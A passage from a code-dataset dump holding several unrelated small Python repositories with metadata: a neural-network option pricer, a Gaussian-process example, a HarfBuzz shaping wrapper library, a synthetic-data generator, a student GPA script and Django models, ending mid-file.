"text": "# coding: utf-8\r\n__author__ = 'fgu041513'\r\n\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nfrom BSpricer import *\r\nfrom scipy.special import expit, logit\r\nimport pickle\r\n\r\nfilename = \"BS_stat_data\"\r\n\r\nwith open(filename, 'rb') as f:\r\n u = pickle._Unpickler(f)\r\n u.encoding = 'latin1'\r\n Xall, Yall, = u.load()\r\n\r\nX = Xall[:10000]\r\nY = Yall[:10000]\r\nXvalid = Xall[10000:20000]\r\nYvalid = Yall[10000:20000]\r\n \r\n# NEURAL NETWORK\r\nfrom keras.models import Sequential, load_model\r\nfrom keras.layers import Dense, Convolution2D, Dropout\r\nfrom keras.regularizers import WeightRegularizer\r\n\r\ninput_dim = X[0].shape[0]\r\noutput_dim = 1\r\n\r\nW_regularizer = WeightRegularizer(l1=0., l2=0.)\r\nmodel = Sequential()\r\nmodel.add(Dense(10, input_dim=input_dim, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(10, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(10, activation='sigmoid', W_regularizer=W_regularizer))\r\nmodel.add(Dense(output_dim, name='output_layer', activation='sigmoid'))\r\nmodel.compile(optimizer='rmsprop', loss='mse')\r\nprint(model.summary())\r\n\r\n# fit\r\nres = model.fit(X, Y, batch_size=50, nb_epoch=50, validation_data = (Xvalid, Yvalid))\r\nplt.figure()\r\nplt.plot(res.epoch, res.history['loss'])\r\n\r\n#model_file_name = \"BS/model.h5\"\r\n#model.save(model_file_name)\r\n#model = load_model(model_file_name)\r\n\r\n# predict\r\nS = np.arange(0.1, 1.1, 0.01)\r\nexpiry = np.array([0.5] * S.shape[0])\r\nstrike = np.array([0.5] * S.shape[0])\r\nsigma = np.array([0.2] * S.shape[0])\r\nX = np.transpose(np.array([S, expiry, strike, sigma]))\r\nY = np.array([ModelBlackScholes(x[0], x[1], PayoffCall(x[2]), sigma=x[3])() / x[0] for x in X])\r\n\r\nmoneyness = strike / S\r\nsigmat = sigma * np.array([m.sqrt(x) for x in expiry])\r\nX = np.transpose(np.array([moneyness, sigmat]))\r\nYhat = model.predict(X)\r\n\r\nplt.figure()\r\nplt.plot(S, Y)\r\nplt.plot(S, Yhat)\r\n\r\n# Implied vol\r\nS = np.arange(0.35, 0.81, 0.01)\r\nexpiry = np.array([0.5] * S.shape[0])\r\nstrike = np.array([0.5] * S.shape[0])\r\nsigma = np.array([0.2] * S.shape[0])\r\nX_BS = np.transpose(np.array([S, expiry, strike, sigma]))\r\nY = np.array([ModelBlackScholes(x[0], x[1], PayoffCall(x[2]), sigma=x[3])() / x[0] for x in X_BS])\r\n\r\nmoneyness = strike / S\r\nsigmat = sigma * np.array([m.sqrt(x) for x in expiry])\r\nX_NN = np.transpose(np.array([moneyness, sigmat]))\r\nYhat = model.predict(X_NN)\r\nsigmahat = np.array([implied_sigma(x[0], x[1], PayoffCall, x[2], 0.0, p[0] * x[0]) for x, p in zip(X_BS, Yhat)])\r\n\r\n \r\nplt.figure()\r\nplt.plot(moneyness, sigma)\r\nplt.plot(moneyness, sigmahat)\r\n"
},
{
"alpha_fraction": 0.531642735004425,
"alphanum_fraction": 0.565978467464447,
"avg_line_length": 22.618783950805664,
"blob_id": "74462ca0d57235979954f29e0016d6784e21700e",
"content_id": "bedcec6d195d7b2afb69b4b61120ec52327944a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4456,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 181,
"path": "/SM/GP_timeseries_example.py",
"repo_name": "masterfulEJ/pythonProjects",
"src_encoding": "UTF-8",
"text": "#%reset -f\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import colors, ticker, cm\r\nfrom matplotlib.mlab import bivariate_normal\r\nfrom numpy.linalg import inv\r\nimport importlib as imp # e.g) imp.reload(gu)\r\n\r\nimport kernel_functions as kf\r\nimport gp_utils as gu\r\n# exec(open(\"gp_utils.py\").read())\r\n\r\nplt.ion()\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef true_func(x):\r\n return np.sin(np.pi * x)\r\n\r\nx = np.linspace(1, 7, 1000)\r\nfx = true_func(x)\r\n\r\nplt.figure(figsize=(12, 6))\r\nplt.subplot(121)\r\nplt.plot(x, fx, 'orange')\r\nplt.grid(alpha=0.2)\r\nplt.ylim((-3, 3))\r\nplt.xlabel(r'$time$')\r\nplt.ylabel(r'$f(x)$')\r\n\r\ncovmat_prior = kf.kfunc_gauss(x, x, l=1)\r\nplt.subplot(122)\r\ngu.gp_plot(np.nan, np.nan, x, np.zeros_like(x), covmat_prior,\r\n n_sample=5, main=\"Samples from a prior\")\r\nplt.plot(x, fx, color='orange')\r\nplt.xlabel(r'$time$')\r\nplt.ylabel(r'$f(x)$')\r\n\r\n# Sampling from the prior\r\n# input observaitons\r\nx_obs = np.linspace(1, 5, 30)\r\n# noisy output obvervations\r\nsig_noise = np.sqrt(0.05)\r\ny_obs = true_func(x_obs) + np.random.normal(0, sig_noise, len(x_obs))\r\nplt.plot(x_obs, y_obs, 'o')\r\nplt.plot(x, true_func(x), color='orange')\r\nplt.grid(alpha=0.2)\r\n\r\nx_pred = x.copy()\r\n\r\n# gauss\r\nkernel_used = kf.kfunc_gauss\r\nparams = {'l': 0.5}\r\nxo = x_obs[0:2]\r\nyo = y_obs[0:2]\r\nmu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(xo, yo, x_pred, mu, var)\r\nplt.plot(x, fx, 'orange')\r\n\r\ninput(\"\")\r\n\r\nfor i in range(3, len(x_obs) + 1):\r\n plt.clf()\r\n xo = x_obs[0:i]\r\n yo = y_obs[0:i]\r\n mu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n gu.gp_plot(xo, yo, x_pred, mu, var)\r\n plt.plot(x, fx, 'orange', alpha=0.5)\r\n plt.pause(0.1)\r\n\r\n\r\n# periodicic\r\nkernel_used = kf.kfunc_per\r\nparams = {'l': 1, 'p': 2}\r\nxo = x_obs[0:2]\r\nyo = y_obs[0:2]\r\nmu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(xo, yo, x_pred, mu, var)\r\nplt.plot(x, fx, 'orange')\r\n\r\ninput(\"\")\r\n\r\nfor i in range(3, len(x_obs) + 1):\r\n plt.clf()\r\n xo = x_obs[0:i]\r\n yo = y_obs[0:i]\r\n mu, var = gu.gp_solve(xo, yo, x_pred, kernel_used, sig_noise, **params)\r\n\r\n gu.gp_plot(xo, yo, x_pred, mu, var)\r\n plt.plot(x, fx, 'orange', alpha=0.5)\r\n plt.pause(0.1)\r\n\r\n\r\n# ----------------------\r\n# Real Exmaple\r\n\r\n#tmp = pd.read_csv('shop.csv')\r\ntmp = pd.read_csv('auto.csv')\r\ntmp = tmp.sort_index(ascending=False)\r\n\r\ndt_raw = pd.Series(tmp['Close'].values, index=pd.to_datetime(tmp['Date']))\r\ndt_smth = pd.ewma(dt_raw, halflife=15)\r\ndt = dt_smth.resample('W-MON', how='last')\r\n#dt = dt_smth.resample('M', how='last')\r\nplt.figure()\r\nplt.plot(dt, color='orange')\r\nplt.grid(alpha=0.2)\r\n\r\nt = np.arange(1, len(dt) + 1)\r\nno_sample = 2\r\nsig_noise = np.sqrt(0.01)\r\n\r\n# periodicic\r\nkernel_used = kf.kfunc_per\r\nparams = {'l': 5, 'p': 12 * 4}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, dt, color='orange')\r\n plt.pause(0.001)\r\n\r\n# linear\r\nkernel_used = kf.kfunc_lin\r\nparams = {'b': 1, 'v': 0.1, 'c': 0}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, dt, color='orange')\r\n plt.pause(0.001)\r\n\r\n## periodicic + linear\r\nkernel_used = kf.kfunc_per_add_lin\r\nparams = {'h': 1, 'l': 5, 'p': 12 * 4.4, 'b': 1, 'v': 0.1, 'c': 0}\r\nt0 = t[0:no_sample]\r\ny0 = dt[0:no_sample]\r\nmu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n\r\nplt.figure()\r\ngu.gp_plot(t0, y0, t, mu, var)\r\n\r\ninput(\"\")\r\n\r\nfor i in range(no_sample + 1, len(t) + 1):\r\n plt.clf()\r\n t0 = t[0:i]\r\n y0 = dt[0:i]\r\n mu, var = gu.gp_solve(t0, y0, t, kernel_used, sig_noise, **params)\r\n gu.gp_plot(t0, y0, t, mu, var)\r\n plt.plot(t, dt, color='orange')\r\n plt.pause(0.001)\r\n"
}
] | 14 |
flowonthegoliv/ENVS231
|
https://github.com/flowonthegoliv/ENVS231
|
d5a3ae20e8e4211f200ae7151be027a1e58a34bc
|
1f85a113a8b95ed4c1a7ea2302ca1b03b3975c96
|
f04c633967e311c512bea60a90ac08c278cd24ce
|
refs/heads/main
| 2023-07-08T20:24:53.149940 | 2021-08-03T11:55:23 | 2021-08-03T11:55:23 | 362,806,678 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.505773663520813,
"alphanum_fraction": 0.5588914752006531,
"avg_line_length": 26.0625,
"blob_id": "95bad92ecf24658e69a8b595f1005f773f6fdb63",
"content_id": "f613761fea01c875d19613bdf34a0375306025f7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 866,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 32,
"path": "/ENVS231_data.py",
"repo_name": "flowonthegoliv/ENVS231",
"src_encoding": "UTF-8",
"text": "def make_data(student_id):\n data = []\n from random import seed\n from random import random\n seed(student_id)\n import numpy as np\n samples = 24*60*7\n height = 500;\n step = 10\n n = samples*(height/step)\n n = np.int(n);\n number = np.zeros((n,1))\n data = np.zeros((samples,np.int(height/step)))\n r = (np.linspace(0.0001,1,np.int(height/step))**0.143)\n s = np.linspace(0.1,1,np.int(height/step))\n base = 25;\n\n for i in range(0,np.int(height/step)):\n a = np.zeros((samples,40))\n for j in range(0,40):\n tmp = random()\n if tmp < 0.2: \n tmp = 1;\n add = np.int((200-base) + base*tmp);\n add = np.int(base*tmp)\n # print(add)\n a[:,j] = np.sin(np.resize(np.linspace(0,2*np.pi,add),samples));\n base = base + 5 \n x = np.sum(a[:,:],1) ;\n data[:,i] = r[i] + x*s[i]\n data = data + 3 + (10*random())/2;\n return data\n"
}
] | 1 |
vpluma/ExampleFinal-IntroCS-Python
|
https://github.com/vpluma/ExampleFinal-IntroCS-Python
|
c8af46ee8faa88fd88614ba062d0fbb422ed74ff
|
0c2332d89bcb5a5c8fc3b8d31c24b68abdf51519
|
cd6920597fd22aef385c5b3fd36e4ee78fc49639
|
refs/heads/master
| 2023-02-02T09:00:02.487149 | 2020-12-17T07:28:41 | 2020-12-17T07:28:41 | 322,215,174 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6019032597541809,
"alphanum_fraction": 0.6090404391288757,
"avg_line_length": 22.11111068725586,
"blob_id": "3d86df4a63297ebc9cd64519f381f21a71c38b4e",
"content_id": "a4caf0fe7687ef5f6d1e9fcc947a3d5aa1552319",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1261,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 54,
"path": "/main.py",
"repo_name": "vpluma/ExampleFinal-IntroCS-Python",
"src_encoding": "UTF-8",
"text": "# Example Semester 1 - Final Python Project\n# Added GitHub Access To REPL.IT\ndef openingBanner():\n\tprint(\"+================+\")\n\tprint(\"+ Opening Banner +\")\n\tprint(\"+================+\")\n\ndef closingBanner():\n\tprint(\" \")\n\tprint(\"+================+\")\n\tprint(\"+ Closing Banner +\")\n\tprint(\"+================+\")\n\ndef askBasic():\n\tname = input(\"Enter name: \")\n\tage = int(input(\"Enter age: \"))\n\tgpa = float(input(\"Enter GPA: \"))\n\treturn name, age, gpa\n\ndef clubs(name):\n\tclubList = []\n\tprint(\"Hi \" + name + \"!\")\n\tnumClubs = int(input(\"Enter number of clubs: \"))\n\tfor i in range(numClubs):\n\t\tclub = input(\"Enter club name: \")\n\t\tclubList.append(club)\n\treturn clubList\n\ndef isHonorStudent(name, gpa):\n\tif gpa >= 3.75:\n\t\tprint(name + \" has earned Highest Honors\")\n\telif gpa >= 3.5 and gpa < 3.75:\n\t\tprint(name + \" has earned High Honors\")\n\telse:\n\t\tprint(name + \" has earned Honors\")\n\ndef printResults(clubList, name, gpa):\n\tclosingBanner()\n\tprint(\"GPA: \" + str(gpa) )\n\tisHonorStudent(name, gpa)\n\tprintClubs(clubList)\n\ndef printClubs(clubList):\n\tprint(\"Club List: \", end = \" \")\n\tfor eachClub in clubList:\n\t\tprint(eachClub, end = \". \")\n\ndef main():\n\topeningBanner()\n\tname, age, gpa = askBasic()\n\tclubList = clubs(name)\n\tprintResults(clubList, name, gpa)\n\nmain()\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
] | 1 |
moyogo/vharfbuzz
|
https://github.com/moyogo/vharfbuzz
|
a0245c24c8f0c0ebfbcac9c5c79dff7ca73c704f
|
03adca1942e046077242936c756687cfb063dc9e
|
7b15617742d45e088b64ec2707dc7b14d67dd5f7
|
refs/heads/main
| 2023-06-06T19:59:07.822982 | 2021-07-12T07:35:10 | 2021-07-12T07:35:10 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5369211435317993,
"alphanum_fraction": 0.5453692078590393,
"avg_line_length": 33.36559295654297,
"blob_id": "dbc717dc83e1f1ae8d632f12621a2deacd95e8b8",
"content_id": "8b2b339577d6da58a7c7b9a248f2c72f0c3af7e1",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9588,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 279,
"path": "/lib/vharfbuzz/__init__.py",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "__author__ = \"\"\"Simon Cozens\"\"\"\n__email__ = \"[email protected]\"\n__version__ = '0.1.0'\n\nimport uharfbuzz as hb\nfrom fontTools.ttLib import TTFont\nimport re\n\nclass FakeBuffer():\n def __init__(self):\n pass\n\nclass FakeItem():\n def __init__(self):\n pass\n\n\nclass Vharfbuzz:\n \"\"\"A user-friendlier way to use Harfbuzz in Python.\n\n Args:\n filename (str): A path to a TrueType font file.\n \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n with open(self.filename, \"rb\") as fontfile:\n self.fontdata = fontfile.read()\n self.ttfont = TTFont(filename)\n self.glyphOrder = self.ttfont.getGlyphOrder()\n self.prepare_shaper()\n self.shapers = None\n self.drawfuncs = None\n\n def prepare_shaper(self):\n face = hb.Face(self.fontdata)\n font = hb.Font(face)\n upem = face.upem\n font.scale = (upem, upem)\n hb.ot_font_set_funcs(font)\n self.hbfont = font\n\n def make_message_handling_function(self, buf, onchange):\n self.history = {\"GSUB\": [], \"GPOS\": []}\n self.lastLookupID = None\n\n def handle_message(msg, buf2):\n m = re.match(\"start lookup (\\\\d+)\", msg)\n if m:\n lookupid = int(m[1])\n self.history[self.stage].append(self.serialize_buf(buf2))\n\n m = re.match(\"end lookup (\\\\d+)\", msg)\n if m:\n lookupid = int(m[1])\n if self.serialize_buf(buf2) != self.history[self.stage][-1]:\n onchange(self, self.stage, lookupid, self._copy_buf(buf2))\n self.history[self.stage].pop()\n if msg.startswith(\"start GPOS stage\"):\n self.stage = \"GPOS\"\n\n return handle_message\n\n def shape(self, text, parameters=None, onchange=None):\n \"\"\"Shapes a text\n\n This shapes a piece of text.\n\n Args:\n text (str): A string of text\n parameters: A dictionary containing parameters to pass to Harfbuzz.\n Relevant keys include ``script``, ``direction``, ``language``\n (these three are normally guessed from the string contents),\n ``features``, ``variations`` and ``shaper``.\n onchange: An optional function with three parameters. See below.\n\n Additionally, if an `onchange` function is provided, this will be called\n every time the buffer changes *during* shaping, with the following arguments:\n\n - ``self``: the vharfbuzz object.\n - ``stage``: either \"GSUB\" or \"GPOS\"\n - ``lookupid``: the current lookup ID\n - ``buffer``: a copy of the buffer as a list of lists (glyphname, cluster, position)\n\n Returns:\n A uharfbuzz ``hb.Buffer`` object\n \"\"\"\n if not parameters:\n parameters = {}\n self.prepare_shaper()\n buf = hb.Buffer()\n buf.add_str(text)\n buf.guess_segment_properties()\n if \"script\" in parameters and parameters[\"script\"]:\n buf.script = parameters[\"script\"]\n if \"direction\" in parameters and parameters[\"direction\"]:\n buf.direction = parameters[\"direction\"]\n if \"language\" in parameters and parameters[\"language\"]:\n buf.language = parameters[\"language\"]\n shapers = self.shapers\n if \"shaper\" in parameters and parameters[\"shaper\"]:\n shapers = [parameters[\"shaper\"]]\n\n features = parameters.get(\"features\")\n if \"variations\" in parameters:\n self.hbfont.set_variations(parameters[\"variations\"])\n self.stage = \"GSUB\"\n if onchange:\n f = self.make_message_handling_function(buf, onchange)\n buf.set_message_func(f)\n hb.shape(self.hbfont, buf, features, shapers=shapers)\n self.stage = \"GPOS\"\n return buf\n\n def _copy_buf(self, buf):\n # Or at least the bits we care about\n outs = []\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n l = [self.glyphOrder[info.codepoint], info.cluster]\n if self.stage == \"GPOS\":\n l.append(pos.position)\n else:\n l.append(None)\n outs.append(l)\n return outs\n\n def serialize_buf(self, buf, glyphsonly=False):\n \"\"\"Serializes a buffer to a string\n\n Returns the contents of the given buffer in a string format similar to\n that used by ``hb-shape``.\n\n Args:\n buf: The ``hb.Buffer`` object.\n\n Returns: A serialized string.\n\n \"\"\"\n outs = []\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n glyphname = self.glyphOrder[info.codepoint]\n if glyphsonly:\n outs.append(glyphname)\n continue\n outs.append(\"%s=%i\" % (glyphname, info.cluster))\n if self.stage == \"GPOS\" and (pos.position[0] != 0 or pos.position[1] != 0):\n outs[-1] = outs[-1] + \"@%i,%i\" % (pos.position[0], pos.position[1])\n if self.stage == \"GPOS\":\n outs[-1] = outs[-1] + \"+%i\" % (pos.position[2])\n return \"|\".join(outs)\n\n def buf_from_string(self, s):\n \"\"\"Deserializes a string.\n\n This attempts to perform the inverse operation to :py:meth:`serialize_buf`,\n turning a serialized buffer back into an object. The object is not a\n ``hb.Buffer``, but has a similar structure (``glyph_infos`` and ``glyph_positions``)\n so can be passed to code which expects a ``hb.Buffer``, such as\n :py:meth:`buf_to_svg` below.\n\n Args:\n s (str): A string produced by :py:meth:`serialize_buf`\n\n Returns a ``FakeBuffer`` object.\n \"\"\"\n buf = FakeBuffer()\n buf.glyph_infos = []\n buf.glyph_positions = []\n for item in s.split(\"|\"):\n m = re.match(r\"^(.*)=(\\d+)(@(-?\\d+),(-?\\d+))?(\\+(-?\\d+))?$\", item)\n if not m:\n raise ValueError(\"Couldn't parse glyph %s in %s\" % (item,s))\n groups = m.groups()\n info = FakeItem()\n info.codepoint = self.ttfont.getGlyphID(groups[0])\n info.cluster = int(groups[1])\n buf.glyph_infos.append(info)\n pos = FakeItem()\n pos.position = [ int(x or 0) for x in (groups[3], groups[4], groups[6], 0) ] # Sorry, vertical scripts\n buf.glyph_positions.append(pos)\n return buf\n\n def setup_svg_draw_funcs(self):\n if self.drawfuncs:\n return\n\n def move_to(x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"M{x},{y}\"\n\n def line_to(x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"L{x},{y}\"\n\n def cubic_to(c1x, c1y, c2x, c2y, x, y, c):\n c[\"output_string\"] = (\n c[\"output_string\"] + f\"C{c1x},{c1y} {c2x},{c2y} {x},{y}\"\n )\n\n def quadratic_to(c1x, c1y, x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"Q{c1x},{c1y} {x},{y}\"\n\n def close_path(c):\n c[\"output_string\"] = c[\"output_string\"] + \"Z\"\n\n self.drawfuncs = hb.DrawFuncs()\n self.drawfuncs.set_move_to_func(move_to)\n self.drawfuncs.set_line_to_func(line_to)\n self.drawfuncs.set_cubic_to_func(cubic_to)\n self.drawfuncs.set_quadratic_to_func(quadratic_to)\n self.drawfuncs.set_close_path_func(close_path)\n\n def glyph_to_svg_path(self, gid):\n \"\"\"Converts a glyph to SVG\n\n Args:\n gid (int): Glyph ID to render\n\n Returns: An SVG string containing a path to represent the glyph.\n \"\"\"\n if not hasattr(hb, \"DrawFuncs\"):\n raise ValueError(\n \"glyph_to_svg_path requires uharfbuzz with draw function support\"\n )\n\n self.setup_svg_draw_funcs()\n container = {\"output_string\": \"\"}\n self.drawfuncs.draw_glyph(self.hbfont, gid, container)\n return container[\"output_string\"]\n\n def buf_to_svg(self, buf):\n \"\"\"Converts a buffer to SVG\n\n Args:\n buf (hb.Buffer): uharfbuzz ``hb.Buffer``\n\n Returns: An SVG string containing a rendering of the buffer\n \"\"\"\n x_cursor = 0\n paths = []\n svg = \"\"\n if \"hhea\" in self.ttfont:\n ascender = self.ttfont[\"hhea\"].ascender + 500\n descender = self.ttfont[\"hhea\"].descender - 500\n fullheight = ascender - descender\n elif \"OS/2\":\n ascender = self.ttfont[\"OS/2\"].sTypoAscender + 500\n descender = self.ttfont[\"OS/2\"].sTypoDescender - 500\n fullheight = ascender - descender\n else:\n fullheight = 1500\n descender = 500\n y_cursor = -descender\n\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n glyph_path = self.glyph_to_svg_path(info.codepoint)\n dx, dy = pos.position[0], pos.position[1]\n p = (\n f'<path d=\"{glyph_path}\" '\n + f' transform=\"translate({x_cursor+dx}, {y_cursor+dy})\"/>\\n'\n )\n svg += p\n x_cursor += pos.position[2]\n y_cursor += pos.position[3]\n\n svg = (\n (\n f'<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 {x_cursor} {fullheight}\"'\n + ' transform=\"matrix(1 0 0 -1 0 0)\">\\n'\n )\n + svg\n + \"</svg>\\n\"\n )\n return svg\n\n\n# v = Vharfbuzz(\"/Users/simon/Library/Fonts/SourceSansPro-Regular.otf\")\n# buf = v.shape(\"ABCj\")\n# svg = v.buf_to_svg(buf)\n# import cairosvg\n# cairosvg.svg2png(bytestring=svg, write_to=\"foo.png\")\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5,
"avg_line_length": 29.83333396911621,
"blob_id": "38f333fb5412e12cd60f340c6245ca47ca58c67f",
"content_id": "6df31acdb377581cc244c0b12eb1f643c019f9a5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 186,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 6,
"path": "/docs/index.rst",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "vharfbuzz: A user-friendlier way to use Harfbuzz in Python\n==========================================================\n\n.. automodule:: vharfbuzz\n :members:\n :member-order: bysource\n\n"
},
{
"alpha_fraction": 0.7269961833953857,
"alphanum_fraction": 0.7323194146156311,
"avg_line_length": 31.875,
"blob_id": "6901857bb17bd8b9473ee2b9c0c9a140d85f73c0",
"content_id": "c7863eda886cb8fab68c1c0973c4cdc29e378241",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1315,
"license_type": "permissive",
"max_line_length": 374,
"num_lines": 40,
"path": "/README.md",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "# vharfbuzz - A user-friendlier way to use Harfbuzz in Python\n\n[uharfbuzz](https://github.com/harfbuzz/uharfbuzz) is an _awesome_ tool for shaping text in Python. But it wraps the Harfbuzz C interface quite closely, so still requires you to perform a bunch of boilerplate operations before you can get on with the shaping. This module allows you a slightly more high-level interface to the text shaping process. For example, rather than:\n\n```python\nwith open(sys.argv[1], 'rb') as fontfile:\n fontdata = fontfile.read()\n\ntext = sys.argv[2]\n\nface = hb.Face(fontdata)\nfont = hb.Font(face)\n\nbuf = hb.Buffer()\nbuf.add_str(text)\nbuf.guess_segment_properties()\n\nfeatures = {\"kern\": True, \"liga\": True}\nhb.shape(font, buf, features)\n```\n\nwith `vharfbuzz` you can just say:\n\n```python\nvhb = Vharfbuzz(sys.argv[1])\nbuf = vhb.shape(sys.argv[2], {\"features\": {\"kern\": True, \"liga\": True}})\n```\n\nThe `Vharfbuzz` class also contains a number of other helpful methods to perform common operations on Harfbuzz buffers. See [Read The Docs](https://vharfbuzz.readthedocs.io/en/latest/) for more information.\n\n## Installation\n\nvharfbuzz is available from `pypi`, so can be installed like so:\n\n pip3 install vharfbuzz\n\nIf building from source, you can install it like so:\n\n pip3 install -r requirements.txt\n pip3 install .\n"
}
] | 3 |
ghimirekiran/inetrn
|
https://github.com/ghimirekiran/inetrn
|
05ee98a3287067512a2a1c46498e5b44a90c6cc6
|
628beaaa80e25d27e0aecdc08f1ac2b1553c9c98
|
17ed36be970282b617c0cdab6abf1fa208996ea6
|
refs/heads/master
| 2020-04-16T13:07:19.638490 | 2019-01-14T07:08:15 | 2019-01-14T07:08:15 | 165,612,358 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4368421137332916,
"alphanum_fraction": 0.4894736707210541,
"avg_line_length": 17,
"blob_id": "645507e8374daf106d204218d5e6cfc6dae5303a",
"content_id": "d26dfd90dbb8ce6cb7fd4e771b86a6bc608877a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/fab.py",
"repo_name": "ghimirekiran/inetrn",
"src_encoding": "UTF-8",
"text": "odd, even = 0,1\r\ntotal = 0\r\nwhile True:\r\n odd = odd + even #Odd\r\n even = odd + even #Even\r\n if even < 4000000:\r\n total += even\r\n else:\r\n break\r\nprint (total)\r\n"
}
] | 1 |
ehg17/dormserv
|
https://github.com/ehg17/dormserv
|
ff934c072f8da1ad1ad3ab0459081472da68a4a9
|
47d2d4830ae3376657a9555f1bb260a6452a889c
|
6e0c88d5d1d7badae16198a232c6f2c9ca91a3fd
|
refs/heads/master
| 2016-08-02T22:05:40.230487 | 2014-02-01T19:10:12 | 2014-02-01T19:10:12 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7913907170295715,
"alphanum_fraction": 0.7913907170295715,
"avg_line_length": 29.100000381469727,
"blob_id": "927047c6617e59cf766afaad88d2d34c701827b0",
"content_id": "520033f559d5b071eb4a2cb124e059386c3e7586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/users/admin.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n# Import the UserProfile model individually.\nfrom users.models import UserProfile\nfrom django.contrib.auth.models import User\n\nclass UserProfileAdmin(admin.ModelAdmin):\n\tlist_display = ('id', 'user','dorm','room',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\n\n"
},
{
"alpha_fraction": 0.658445417881012,
"alphanum_fraction": 0.6722720265388489,
"avg_line_length": 24.740385055541992,
"blob_id": "3cac897e619edafeb831cdaab419e28edb56e9fa",
"content_id": "7796892ece2fae6725557e19d93b2e177cf61e82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2676,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 104,
"path": "/dormserv/cal/models.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom users.models import User, UserProfile\nfrom django.contrib import admin\nimport datetime\nfrom django.utils import timezone\nfrom datetime import date, time, timedelta\nfrom django.template import RequestContext\n\n\nclass Entry(models.Model):\n\tstart_time = models.TimeField(auto_now=False)\n\tdate = models.DateField(auto_now=False)\n\tdeliveries_avail = models.IntegerField(default=2)\n\tdemand_counter = models.IntegerField(default=0)\n\n\tdef fifteen_over(self):\n\t\td_ref = self.date.strftime(\"%Y:%m:%d\")\n\t\td_ref_spl = d_ref.split(\":\")\n\t\tt_ref = self.start_time.strftime(\"%I:%M\")\n\t\tt_ref_spl = t_ref.split(\":\")\n\t\tdt = datetime.datetime(int(d_ref_spl[0]), int(d_ref_spl[1]), int(d_ref_spl[2]), int(t_ref_spl[0]), int(t_ref_spl[1]), 00)\n\t\ttime_of_concern = dt + datetime.timedelta(minutes=15)\n\t\tt = time_of_concern.strftime(\"%I:%M\")\n\t\tif t[0] == \"0\":\n\t\t\treturn t[1:] + \" am\"\n\t\treturn t + \" am\"\n\n\tdef 